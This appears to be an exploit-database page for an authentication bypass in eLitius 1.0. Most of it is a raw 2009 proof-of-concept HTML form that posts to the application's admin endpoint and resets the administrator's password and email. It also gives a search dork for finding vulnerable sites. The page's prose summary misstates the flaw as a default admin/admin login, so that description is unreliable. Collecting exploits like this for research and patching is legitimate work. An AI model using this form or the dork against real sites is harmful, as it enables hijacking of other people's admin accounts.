header-logo
Suggest Exploit
vendor:
eLitius
by:
ThE g0bL!N
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: eLitius
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:elitius:elitius
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Powered by eLitius Version 1.0 Change Password

This vulnerability allows an attacker to bypass authentication and gain access to the admin panel of the eLitius Version 1.0. The vulnerability is due to the fact that the application does not properly validate the username and password fields. An attacker can exploit this vulnerability by setting the username and password fields to 'admin' and gain access to the admin panel.

Mitigation:

Upgrade to the latest version of eLitius.
Source

Exploit-DB raw data:

 <title> Powered by eLitius Version 1.0 Change Password </title>
  
<form action="http://esyndicat.org/admin/manage-admin.php" method="post" name="adminForm">
  <table class="admintable">
  <tbody><tr>
   <td>
    <table class="adminform" cellpadding="0" cellspacing="0">
    <tbody>
    <tr>
     <th colspan="2">Change Password Of admin </th>
    </tr>
    <tr>
     
     
    </tr>
    <tr>
     <td>Username:</td>
     <td>
      <input name="username" class="inputbox" size="40" value="admin" type="text" readonly="readonly" />
     </td>
    </tr><tr>
     <td>Password:</td>
     <td>
      <input class="inputbox" name="password" size="40" value="admin" type="text" />
     </td>
    </tr>
    <tr>
     <td>Email:</td>
     <td><input class="inputbox" name="email" size="40" value="x0q@hotmail.fr" type="text" /></td>
    </tr>
    <tr>
     <td colspan="2">&nbsp;
     </td>
    </tr>

    </tbody>
    </table>
    <input name="task" value="" type="hidden" />
    <div style="margin-top:10px;"><input class="button" onclick="document.adminForm.task.value='edit'" type="submit" value="Save"></div>    
   </td>
   <td style="vertical-align: top; margin: 0; padding: 0;">
    <table class="adminform" cellpadding="0" cellspacing="0">
    <tr>
     <th colspan="2">Dork: Powered by eLitius Version 1.0</th>
    </tr>
<th colspan="2">Greetz To: Dos-Dz TeaM Snakes TeaM His0k4 </th>
    <tr>
     <center><td style="font-weight: bold;">Cod[3]d By ThE g0bL!N</td> </center>
    </tr>
  </table>
  </td>
  </tr>
  </tbody>
  </table>
  <input name="cid[]" value="1" type="hidden" />
<td>Download:http://www.elitius.com/</td>
</form>
 
</body>
</html>

# milw0rm.com [2009-04-16]

Navigation

Suggest Exploit

Services By CQR